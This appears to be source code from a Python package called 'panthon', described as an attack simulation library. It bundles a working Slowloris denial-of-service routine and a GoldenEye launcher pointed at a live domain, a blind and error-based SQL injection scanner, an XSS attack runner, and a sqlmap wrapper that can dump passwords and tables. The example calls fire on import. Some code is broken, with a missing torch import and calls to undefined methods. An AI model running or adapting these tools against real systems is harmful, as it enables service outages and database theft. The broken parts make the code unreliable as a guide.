import socket
import random
from random_string_generator import RandomStringGenerator
import logging
import subprocess
from urllib.parse import urlparse
import os


logging.basicConfig(
    level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s"
)


class DoSAttack:
    def __init__(self):
        self.threads = []

    def create_connection(self, url, target_port, model=RandomStringGenerator(100)):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            parsed_url = urlparse(url)
            hostname = parsed_url.netloc
            ip = socket.gethostbyname(hostname)
            sock.connect((ip, target_port))
            payload = model(torch.tensor([])).encode()  # Generate payload
            sock.send(payload)
            logging.info(f"Payload sent: {payload}")
            sock.send(b"QUIT")
            sock.close()
        except Exception as e:
            logging.error(f"Exception occurred while creating a connection: {e}")

    def send_line(self, s, line):
        line = f"{line}\r\n"
        s.send(line.encode("utf-8"))

    def send_header(self, s, name, value):
        self.send_line(s, f"{name}: {value}")

    def slowloris_attack(self, num_connections, url, target_port):
        def read_user_agents(file_name):
            user_agents = []
            with open(file_name, "r") as file:
                for line in file:
                    user_agents.append(line.strip())
            return user_agents

        path = os.path.join(os.path.dirname(__file__), "useragents.txt")
        user_agents = read_user_agents(path)
        list_of_sockets = []

        def init_socket(ip: str):
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(4)
            s.connect((ip, target_port))
            self.send_line(s, f"GET /?{random.randint(0, 2000)} HTTP/1.1")
            ua = random.choice(user_agents)
            self.send_header(s, "User-Agent", ua)
            self.send_header(s, "Accept-language", "en-US,en,q=0.5")
            return s

        def slowloris_iteration(self):
            logging.info("Sending keep-alive headers...")
            logging.info("Socket count: %s", len(list_of_sockets))

            # Try to send a header line to each socket
            for s in list(list_of_sockets):
                try:
                    self.send_header(s, "X-a", random.randint(1, 5000))
                except socket.error:
                    list_of_sockets.remove(s)

            # Some of the sockets may have been closed due to errors or timeouts.
            # Re-create new sockets to replace them until we reach the desired number.

            diff = num_connections - len(list_of_sockets)
            if diff <= 0:
                return

            logging.info("Creating %s new sockets...", diff)
            for _ in range(diff):
                try:
                    parsed_url = urlparse(url)
                    hostname = parsed_url.netloc
                    s = init_socket(socket.gethostbyname(hostname))
                    if not s:
                        continue
                    list_of_sockets.append(s)
                except socket.error as e:
                    logging.debug("Failed to create new socket: %s", e)
                    break

        parsed_url = urlparse(url)
        hostname = parsed_url.netloc
        ip = socket.gethostbyname(hostname)
        socket_count = num_connections
        logging.info("Attacking %s with %s sockets.", ip, socket_count)
        for _ in range(socket_count):
            try:
                logging.debug("Creating socket nr %s", _)
                s = init_socket(ip)
            except socket.error as e:
                logging.debug(e)
                break
            list_of_sockets.append(s)

        while True:
            try:
                slowloris_iteration()
            except (KeyboardInterrupt, SystemExit):
                logging.info("Stopping Slowloris")
                break
            except Exception as e:
                logging.debug("Error in Slowloris iteration: %s", e)

    def slowhttptest_attack(self):
        raise NotImplementedError

    def hulk_attack(self):
        raise NotImplementedError

    def goldeneye_attack(
        self,
        url,
        user_agents=os.path.join(os.path.dirname(__file__), "useragents.txt"),
        workers=10,
        sockets=500,
        method="get",
        nosslcheck=True,
    ):
        logging.info("Attacking %s with GoldenEye...", url)
        path = os.path.join(os.path.dirname(__file__), "goldeneye.py")
        command = [
            "python3",
            path,
            url,
            "-u",
            str(user_agents),
            "-w",
            str(workers),
            "-s",
            str(sockets),
            "-m",
            method,
            "-n",
            str(nosslcheck),
        ]
        subprocess.run(command)


dos = DoSAttack()  # target_url, num_connections, attack_type
# dos.simulate_attack()

# dos.slowloris_attack(num_connections=100, url="https://panthon.app", target_port=80)

dos.goldeneye_attack(url="https://panthon.app")



#!/usr/bin/python3
import difflib, http.client, itertools, optparse, random, re, urllib, urllib.parse, urllib.request  # Python 3 required

NAME = ("Damn Small SQLi Scanner (DSSS) < 100 LoC (Lines of Code)",)

PREFIXES, SUFFIXES = (" ", ") ", "' ", "') "), (
    "",
    "-- -",
    "#",
    "%%16",
)  # prefix/suffix values used for building testing blind payloads
TAMPER_SQL_CHAR_POOL = (
    "(",
    ")",
    "'",
    '"',
)  # characters used for SQL tampering/poisoning of parameter values
BOOLEAN_TESTS = (
    "AND %d=%d",
    "OR NOT (%d>%d)",
)  # boolean tests used for building testing blind payloads
COOKIE, UA, REFERER = "Cookie", "User-Agent", "Referer"  # optional HTTP header names
GET, POST = "GET", "POST"  # enumerator-like values used for marking current phase
TEXT, HTTPCODE, TITLE, HTML = range(
    4
)  # enumerator-like values used for marking content type
FUZZY_THRESHOLD = (
    0.95  # ratio value in range (0,1) used for distinguishing True from False responses
)
TIMEOUT = 30  # connection timeout in seconds
RANDINT = random.randint(1, 255)  # random integer value used across all tests
BLOCKED_IP_REGEX = (  # regular expression used for recognition of generic firewall blocking messages
    r"(?i)(\A|\b)IP\b.*\b(banned|blocked|bl(a|o)ck\s?list|firewall)"
)

DBMS_ERRORS = (
    {  # regular expressions used for DBMS recognition based on error message response
        "MySQL": (
            r"SQL syntax.*MySQL",
            r"Warning.*mysql_.*",
            r"valid MySQL result",
            r"MySqlClient\.",
        ),
        "PostgreSQL": (
            r"PostgreSQL.*ERROR",
            r"Warning.*\Wpg_.*",
            r"valid PostgreSQL result",
            r"Npgsql\.",
        ),
        "Microsoft SQL Server": (
            r"Driver.* SQL[\-\_\ ]*Server",
            r"OLE DB.* SQL Server",
            r"(\W|\A)SQL Server.*Driver",
            r"Warning.*mssql_.*",
            r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}",
            r"(?s)Exception.*\WSystem\.Data\.SqlClient\.",
            r"(?s)Exception.*\WRoadhouse\.Cms\.",
        ),
        "Microsoft Access": (
            r"Microsoft Access Driver",
            r"JET Database Engine",
            r"Access Database Engine",
        ),
        "Oracle": (
            r"\bORA-[0-9][0-9][0-9][0-9]",
            r"Oracle error",
            r"Oracle.*Driver",
            r"Warning.*\Woci_.*",
            r"Warning.*\Wora_.*",
        ),
        "IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("),
        "SQLite": (
            r"SQLite/JDBCDriver",
            r"SQLite.Exception",
            r"System.Data.SQLite.SQLiteException",
            r"Warning.*sqlite_.*",
            r"Warning.*SQLite3::",
            r"\[SQLITE_ERROR\]",
        ),
        "Sybase": (
            r"(?i)Warning.*sybase.*",
            r"Sybase message",
            r"Sybase.*Server message.*",
        ),
    }
)


def _retrieve_content(url, data=None):
    retval = {HTTPCODE: http.client.OK}
    try:
        req = urllib.request.Request(
            "".join(
                url[_].replace(" ", "%20") if _ > url.find("?") else url[_]
                for _ in range(len(url))
            ),
            data.encode("utf8", "ignore") if data else None,
            globals().get("_headers", {}),
        )
        retval[HTML] = urllib.request.urlopen(req, timeout=TIMEOUT).read()
    except Exception as ex:
        retval[HTTPCODE] = getattr(ex, "code", None)
        retval[HTML] = ex.read() if hasattr(ex, "read") else str(ex.args[-1])
    retval[HTML] = (
        retval[HTML].decode("utf8", "ignore") if hasattr(retval[HTML], "decode") else ""
    ) or ""
    retval[HTML] = "" if re.search(BLOCKED_IP_REGEX, retval[HTML]) else retval[HTML]
    retval[HTML] = re.sub(
        r"(?i)[^>]*(AND|OR)[^<]*%d[^<]*" % RANDINT, "__REFLECTED__", retval[HTML]
    )
    match = re.search(r"<title>(?P<result>[^<]+)</title>", retval[HTML], re.I)
    retval[TITLE] = (
        match.group("result") if match and "result" in match.groupdict() else None
    )
    retval[TEXT] = re.sub(
        r"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>|<[^>]+>|\s+",
        " ",
        retval[HTML],
    )
    return retval


def scan_page(url, data=None):
    retval, usable = False, False
    url, data = re.sub(r"=(&|\Z)", "=1\g<1>", url) if url else url, (
        re.sub(r"=(&|\Z)", "=1\g<1>", data) if data else data
    )
    try:
        for phase in (GET, POST):
            original, current = None, url if phase is GET else (data or "")
            for match in re.finditer(
                r"((\A|[?&])(?P<parameter>[^_]\w*)=)(?P<value>[^&#]+)", current
            ):
                vulnerable, usable = False, True
                print(
                    "* scanning %s parameter '%s'" % (phase, match.group("parameter"))
                )
                original = original or (
                    _retrieve_content(current, data)
                    if phase is GET
                    else _retrieve_content(url, current)
                )
                tampered = current.replace(
                    match.group(0),
                    "%s%s"
                    % (
                        match.group(0),
                        urllib.parse.quote(
                            "".join(
                                random.sample(
                                    TAMPER_SQL_CHAR_POOL, len(TAMPER_SQL_CHAR_POOL)
                                )
                            )
                        ),
                    ),
                )
                content = (
                    _retrieve_content(tampered, data)
                    if phase is GET
                    else _retrieve_content(url, tampered)
                )
                for dbms, regex in (
                    (dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]
                ):
                    if (
                        not vulnerable
                        and re.search(regex, content[HTML], re.I)
                        and not re.search(regex, original[HTML], re.I)
                    ):
                        print(
                            " (i) %s parameter '%s' appears to be error SQLi vulnerable"
                            " (%s)" % (phase, match.group("parameter"), dbms)
                        )
                        retval = vulnerable = True
                vulnerable = False
                for prefix, boolean, suffix, inline_comment in itertools.product(
                    PREFIXES, BOOLEAN_TESTS, SUFFIXES, (False, True)
                ):
                    if not vulnerable:
                        template = ("%s%s%s" % (prefix, boolean, suffix)).replace(
                            " " if inline_comment else "/**/", "/**/"
                        )
                        payloads = dict(
                            (
                                _,
                                current.replace(
                                    match.group(0),
                                    "%s%s"
                                    % (
                                        match.group(0),
                                        urllib.parse.quote(
                                            template
                                            % (RANDINT if _ else RANDINT + 1, RANDINT),
                                            safe="%",
                                        ),
                                    ),
                                ),
                            )
                            for _ in (True, False)
                        )
                        contents = dict(
                            (
                                _,
                                (
                                    _retrieve_content(payloads[_], data)
                                    if phase is GET
                                    else _retrieve_content(url, payloads[_])
                                ),
                            )
                            for _ in (False, True)
                        )
                        if all(
                            _[HTTPCODE]
                            and _[HTTPCODE] < http.client.INTERNAL_SERVER_ERROR
                            for _ in (original, contents[True], contents[False])
                        ):
                            if any(
                                original[_] == contents[True][_] != contents[False][_]
                                for _ in (HTTPCODE, TITLE)
                            ):
                                vulnerable = True
                            else:
                                ratios = dict(
                                    (
                                        _,
                                        difflib.SequenceMatcher(
                                            None, original[TEXT], contents[_][TEXT]
                                        ).quick_ratio(),
                                    )
                                    for _ in (False, True)
                                )
                                vulnerable = (
                                    all(ratios.values())
                                    and min(ratios.values())
                                    < FUZZY_THRESHOLD
                                    < max(ratios.values())
                                    and abs(ratios[True] - ratios[False])
                                    > FUZZY_THRESHOLD / 10
                                )
                        if vulnerable:
                            print(
                                " (i) %s parameter '%s' appears to be blind SQLi"
                                " vulnerable (e.g.: '%s')"
                                % (phase, match.group("parameter"), payloads[True])
                            )
                            retval = True
        if not usable:
            print(" (x) no usable GET/POST parameters found")
    except KeyboardInterrupt:
        print("\r (x) Ctrl-C pressed")
    return retval


def init_options(proxy=None, cookie=None, ua=None, referer=None):
    globals()["_headers"] = dict(
        filter(lambda _: _[1], ((COOKIE, cookie), (UA, ua or NAME), (REFERER, referer)))
    )
    urllib.request.install_opener(
        urllib.request.build_opener(urllib.request.ProxyHandler({"http": proxy}))
        if proxy
        else None
    )



import requests
from bs4 import BeautifulSoup
import logging
import os
import subprocess

logging.basicConfig(level=logging.INFO)


class XSSAttack:
    def __init__(
        self,
        url,
        time=25,
        checks=5,
        threads=1000,
        attack_type="xanxxs",
        file="XanXSS/xss-payload-list.txt",
    ):
        self.url = url
        self.time = time
        self.file = file
        self.session = requests.Session()
        with open(self.file, "r") as file:
            self.payloads = [line.strip() for line in file]
        self.threads = []
        self.threads = threads
        self.attack_type = attack_type

    def create_attacks(self):
        self.run_attack()

    def run_attack(self):
        if self.attack_type == "xanxxs":
            self.xanxxs_attack()
        if self.attack_type == "xsstrike":
            self.xsstrike_attack()
        else:
            logging.error(f"Unknown attack type: {self.attack_type}")

    def xanxxs_attack(self):
        path_to_executable = os.path.join(os.path.dirname(__file__), "XanXSS/xanxss.py")
        command = ["python3", path_to_executable, "-u", self.url, "--payloads"]
        command.extend(self.payloads)
        command.extend(["--time", str(self.time)])
        command.extend(["-a", "1"])

        subprocess.run(command)

    def xsstrike_attack(self):
        path_to_executable = os.path.join(
            os.path.dirname(__file__), "XSStrike/xsstrike.py"
        )
        command = [
            "python3",
            path_to_executable,
            "-u",
            self.url,
            "-t",
            str(self.threads),
            "--file",
            self.file,
        ]

        subprocess.run(command)


# Target URL
target_url = "http://xss-game.appspot.com/level1/frame?query="

# Create and launch attack
attack = XSSAttack(target_url, time=25, checks=5, threads=1000, attack_type="xsstrike")
attack.create_attacks()
attack.wait_for_threads()



from random_string_generator import RandomStringGenerator
import logging
import subprocess
import os
import dsss


class SQLInjectionAttack:
    def sqlmap_attack(
        self,
        target_url,
        level=1,
        risk=1,
        password=False,
        dbs=False,
        tables=False,
        database=None,
        dump=False,
        TBL=None,
    ):
        logging.info("Attacking %s with SQLMap...", target_url)
        path_to_executable = os.path.join(os.path.dirname(__file__), "sqlmap/sqlmap.py")
        command = [
            "python3",
            path_to_executable,
            "-u",
            target_url,
            "--batch",
            "--level",
            str(level),
            "--risk",
            str(risk),
            "--passwords" if password else "",
            "--dbs" if dbs else "",
            "--tables" if tables else "",
            "-D" if database else "",
            database if database else "",
            "--dump" if dump else "",
            "-T" if TBL else "",
            TBL if TBL else "",
        ]
        subprocess.run(command)

    def sqli_scanner(
        self, target_url, data=None, cookie=None, ua=None, referer=None, proxy=None
    ):
        """Scans the target_url for potential SQL injection vulnerabilities.

        Args:
        - target_url (str): The target URL to scan.
        - data (str, optional): POST data to send with the request.
        - cookie (str, optional): HTTP Cookie header value.
        - ua (str, optional): HTTP User-Agent header value.
        - referer (str, optional): HTTP Referer header value.
        - proxy (str, optional): HTTP proxy address.

        Returns:
        - bool: True if potential vulnerabilities are found, False otherwise.
        """

        # Initialize options for the scanner
        dsss.init_options(proxy=proxy, cookie=cookie, ua=ua, referer=referer)

        # Scan the target URL
        result = dsss.scan_page(target_url, data)

        # Print the result
        logging.info(
            "\nscan results: %s vulnerabilities found"
            % ("possible" if result else "no")
        )

        return result


# Example usage:
sql_injection_attack = SQLInjectionAttack()
target_url = "http://localhost:3000/rest/products/search?q="
sql_injection_attack.sqli_scanner(target_url)
sql_injection_attack.sqlmap_attack(target_url, database="test")



"""Setup file for the Panthon package.

Specifies package details and dependencies.
"""
from setuptools import setup, find_packages

# # Read in requirements.txt with specified encoding
# with open("~/panthon/requirements.txt", "r", encoding="utf-8") as f:
#     requirements = f.read().splitlines()

requirements = ["torch", "scapy", "netifaces", "bs4", "tld", "fuzzywuzzy", "requests"]

setup(
    name="panthon",
    version="0.1.11",
    url="https://github.com/nripeshn/panthon",
    author="Nripesh Niketan",
    author_email="nripesh14@gmail.com",
    description="A Machine Learning-powered Cybersecurity Attack Simulation Library",
    packages=find_packages(),
    install_requires=requirements,
    classifiers=[
        "Development Status :: 3 - Alpha",
        "Intended Audience :: Developers",
        "Topic :: Software Development :: Build Tools",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.10",
        "Programming Language :: Python :: 3.11",
    ],
)
